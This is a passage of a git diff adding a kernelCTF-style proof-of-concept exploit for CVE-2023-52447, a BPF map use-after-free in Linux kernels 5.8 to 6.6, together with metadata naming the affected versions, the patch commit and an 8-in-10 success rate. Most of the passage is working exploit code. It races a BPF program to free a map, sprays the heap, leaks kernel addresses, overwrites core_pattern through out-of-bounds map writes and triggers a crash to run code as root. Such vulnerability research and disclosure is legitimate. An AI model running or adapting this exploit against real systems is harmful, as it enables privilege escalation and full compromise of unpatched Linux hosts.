target arraymap + int signal = bpf_create_map_mmap(BPF_MAP_TYPE_ARRAY, 4, 8, 0x30, 0); + + // Target arraymap will be stored into this array of maps. + int array_of_map = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4, + 0x30, samplemap); + + // The target will be freed in the middle of bpf program. + int target = bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, 8, 0x30, 0); + + // mmap arraymap region for userspace to know signal. + signal_addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, + signal, 0); + + // store target into array_of_map + update_elem(array_of_map, 0, target); + + // decrease target refcnt to one + close(target); + + // init and load race bpf program. + int sfd[2] = {}; + struct bpf_insn *race_prog = NULL; + int race_prog_cnt = init_race_prog(&race_prog, array_of_map, ringbuf, + arraymap, signal); + load_bpf_prog(race_prog, race_prog_cnt, sfd); + + // Spawn two thread for trigger bpf program and spray to reallcate target to array of maps. + pthread_t tid, spray_tid; + pthread_create(&tid, 0, write_msg, &sfd[0]); + pthread_create(&spray_tid, 0, spray_job, 0); + + while (signal_addr[0] == 0) + ; + // Free target + update_elem(array_of_map, 0, victim); + pthread_join(tid, 0); + pthread_join(spray_tid, 0); + + size_t kheap = get_elem(arraymap, 0); + size_t kaddr = 0; + + for (int i = 0; i < 0x100; i++) { + // If we can leak, it means that we have overwrite victim's max_entries and index_mask + size_t leak = leak_kbase((int)spray_fd[i]); + if (leak) { + kaddr = leak; + break; + } + else + close(spray_fd[i]); + } + printf("Kaddr: 0x%lx\n", kaddr); + printf("Kheap: 0x%lx\n", kheap); + + target = 0; + for (int i = 0; i < 0x20; i++) { + update_elem(oob[i], 0, samplemap); + // OOB read victim map to identify who is allocated after victim. + size_t val = get_elem(victim, (0x400 + 0x110 - 0x110) / 8); + if (val) { + target = i; + break; + } + } + size_t *p = (size_t *)"|/proc/%P/fd/666 %P"; + + // Store the address (core_pattern - struct_bpf_array_offset) we want to overwrite. + update_elem(victim, (0x400 + 0x110 - 0x110) / 8, kaddr); + + // Store contents we want to overwrite in arraymap + for (int i = 0; i < 4; i++) { + update_elem(victim, i, p[i]); + } + // Trigger bpf program to overwrite core_pattern + write_core_pattern(oob[target], victim); + system("cat /proc/sys/kernel/core_pattern"); + if(fork()==0) + crash(""); + while(1) sleep(100); +} diff --git a/pocs/linux/kernelctf/CVE-2023-52447_cos/metadata.json b/pocs/linux/kernelctf/CVE-2023-52447_cos/metadata.json new file mode 100755 index 00000000..6add7984 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-52447_cos/metadata.json @@ -0,0 +1,30 @@ +{ + "$schema":"https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids":[ + "exp134" + ], + "vulnerability":{ + "patch_commit":"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=876673364161da50eed6b472d746ef88242b2368", + "cve":"CVE-2023-52447", + "affected_versions":[ + "5.8 - 6.6" + ], + "requirements":{ + "attack_surface":[ + ], + "capabilities":[ + ], + "kernel_config":[ + "CONFIG_BPF_SYSCALL" + ] + } + }, + "exploits": { + "cos-105-17412.294.10": { + "uses":[ + ], + "requires_separate_kaslr_leak": false, + "stability_notes":"8 times success per 10 times run" + } + } + } diff --git a/pocs/linux/kernelctf/CVE-2023-52447_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2023-52447_cos/original.tar.gz new file mode 100755 index 00000000..3b1b7128 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-52447_cos/original.tar.gz differ